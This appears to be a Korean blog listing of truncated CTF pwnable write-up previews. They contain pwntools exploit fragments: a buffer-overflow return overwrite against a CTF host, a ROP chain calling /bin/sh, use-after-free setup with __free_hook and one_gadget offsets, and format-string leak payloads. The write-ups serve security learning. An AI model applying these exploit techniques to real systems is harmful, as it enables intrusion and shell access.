대회기간 풀지 못했던 문제이며, writeup을 보고 원리를 이해하며 작성한 글입니다. Full RELRO - GOT Overwrite 불가능 NX enabled - 쉘코드를 메모리에 적재해 실행시키는것 불가능 PIE - 주소 랜덤화 코드 분석 1. big?에서 size를 입력 받고 그 size만큼 malloc을 호출 2. here: malloc이 반환한 메모리의 주소 출력 3. far? 다음 scanf("%ld")로 입력 -> 숫자만 입력 4. what? 다음 scanf("%zu")로 입력 -> 숫자만 입력 공격 벡터 1. here?에서 top chunk 값보다 큰 값을 입력(예를 들어 10000000)하면 mmap을 사용하여 힙에 할당 2. 청크 주소를 가지고 libc 주소를 알 수 있음.(libc ..
PWNABLE stonks 바로 bof로 ret까지 덮고 ai_debug를 호출만 하면됨 from pwn import * p = remote('stonks.hsc.tf',1337) #p = process('./stonks') e = ELF('./stonks') payload = "A"*0x20 payload += "B"*0x8 payload += p64(0x401260) #assembly address p.sendlineafter('symbol: ', payload) p.interactive() House of sice glibc 2.31이라 DFG가 가능하며 2.26이후로 tcache가 생기는 바람에 tcache도 우회해야함 내가 생각했던 공격 방식은 tcache를 7개 채운후, fastbin에 chu..
BCA Mart 정수 오버플로우 이용하는 문제 6넣고, int의 최대 범위인 2147483647 넣어주면 음수로 변하면서 풀림 Honor 단순히 A를 100번 넣어주면 끝 I Can Haz Interwebz?(misc) 그냥 들어가기만 하면 플래그 AP ABCs 총 SCORE까지는 76떨어져있고, score에 ABCs만 맞추면 됨 Amer-lit fsb문제 플래그는 %20$p~%30$p로 노가다 해서 땄는데 왜 안먹히는지 모르겠다 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ 2021.06.19에 추가 실제 플래그는 아래와 같다 bcactf{totally_not_employing_the_use_of_generic_words_to_reach_the_req..
f = open('tmp.jpg', 'w') tmp = p.recvuntil('1. List files.') f.write(tmp) f.close() pwnable win까지 호출하는데는 성공했지만 저부분에서 fwrite가 호출되면 이런 값이 나오는데 이 값을 jpg로 변환하는 것을 못하겠다.. +++++++++++++++++++++++++++++++++++++++++++++++ 2021.06.19에 추가한 내용 https://jiravvit.tistory.com/entry/Circle-City-Con-CTF-2021-pwnable-Baby-Fawn-CDN-%ED%92%80%EC%9D%B4-overwriting?category=902325 [Circle City Con CTF 2021 : pwnable]..
Pwnable 2021. 7. 25. 18:15
Binary Mitigation Exploit from pwn import * context.terminal=["terminator", "-e"] p = process('./babyuaf') e = ELF('./babyuaf') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') main_arana_offset = 0x3c4b20 free_hook_offset = libc.symbols['__free_hook'] one_gadget = [0x45226,0x4527a,0xf0364,0xf1207] # ldd local libc def add_info(name, age, comment): p.sendlineafter('> ', "1") p.sendafter('name : ', ..
Pwnable 2021. 7. 14. 20:00
대회기간 풀지 못했던 문제이며, writeup을 보고 원리를 이해하며 작성한 글입니다. Full RELRO - GOT Overwrite 불가능 NX enabled - 쉘코드를 메모리에 적재해 실행시키는것 불가능 PIE - 주소 랜덤화 코드 분석 1. big?에서 size를 입력 받고 그 size만큼 malloc을 호출 2. here: malloc이 반환한 메모리의 주소 출력 3. far? 다음 scanf("%ld")로 입력 -> 숫자만 입력 4. what? 다음 scanf("%zu")로 입력 -> 숫자만 입력 공격 벡터 1. here?에서 top chunk 값보다 큰 값을 입력(예를 들어 10000000)하면 mmap을 사용하여 힙에 할당 2. 청크 주소를 가지고 libc 주소를 알 수 있음.(libc ..
Pwnable 2021. 6. 19. 17:13
from pwn import * #p = remote('remote1.thcon.party', 10900) p = process('./babyrop') e = ELF('./babyrop') libc = e.libc bss = e.bss() + 0x100 pop_rdi = 0x4012c3 pop_rsi_r15 = 0x4012c1 binsh = 0x40201a # 이부분은 string에 보면 /bin/sh 문자열이 있고, 문자열시작 부터 /bin/sh까지 바이트를 더해주면됨 #gdb.attach(p) secret = 0x4011f3 payload = '' payload += "A"*0x20 payload += "B"*8 payload += p64(pop_rdi) payload += p64(binsh) pay..
Pwnable 2021. 6. 19. 17:06
PWNABLE stonks 바로 bof로 ret까지 덮고 ai_debug를 호출만 하면됨 from pwn import * p = remote('stonks.hsc.tf',1337) #p = process('./stonks') e = ELF('./stonks') payload = "A"*0x20 payload += "B"*0x8 payload += p64(0x401260) #assembly address p.sendlineafter('symbol: ', payload) p.interactive() House of sice glibc 2.31이라 DFG가 가능하며 2.26이후로 tcache가 생기는 바람에 tcache도 우회해야함 내가 생각했던 공격 방식은 tcache를 7개 채운후, fastbin에 chu..
Pwnable 2021. 6. 12. 14:56
BCA Mart 정수 오버플로우 이용하는 문제 6넣고, int의 최대 범위인 2147483647 넣어주면 음수로 변하면서 풀림 Honor 단순히 A를 100번 넣어주면 끝 I Can Haz Interwebz?(misc) 그냥 들어가기만 하면 플래그 AP ABCs 총 SCORE까지는 76떨어져있고, score에 ABCs만 맞추면 됨 Amer-lit fsb문제 플래그는 %20$p~%30$p로 노가다 해서 땄는데 왜 안먹히는지 모르겠다 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ 2021.06.19에 추가 실제 플래그는 아래와 같다 bcactf{totally_not_employing_the_use_of_generic_words_to_reach_the_req..
Pwnable 2021. 6. 12. 02:51
f = open('tmp.jpg', 'w') tmp = p.recvuntil('1. List files.') f.write(tmp) f.close() pwnable win까지 호출하는데는 성공했지만 저부분에서 fwrite가 호출되면 이런 값이 나오는데 이 값을 jpg로 변환하는 것을 못하겠다.. +++++++++++++++++++++++++++++++++++++++++++++++ 2021.06.19에 추가한 내용 https://jiravvit.tistory.com/entry/Circle-City-Con-CTF-2021-pwnable-Baby-Fawn-CDN-%ED%92%80%EC%9D%B4-overwriting?category=902325 [Circle City Con CTF 2021 : pwnable]..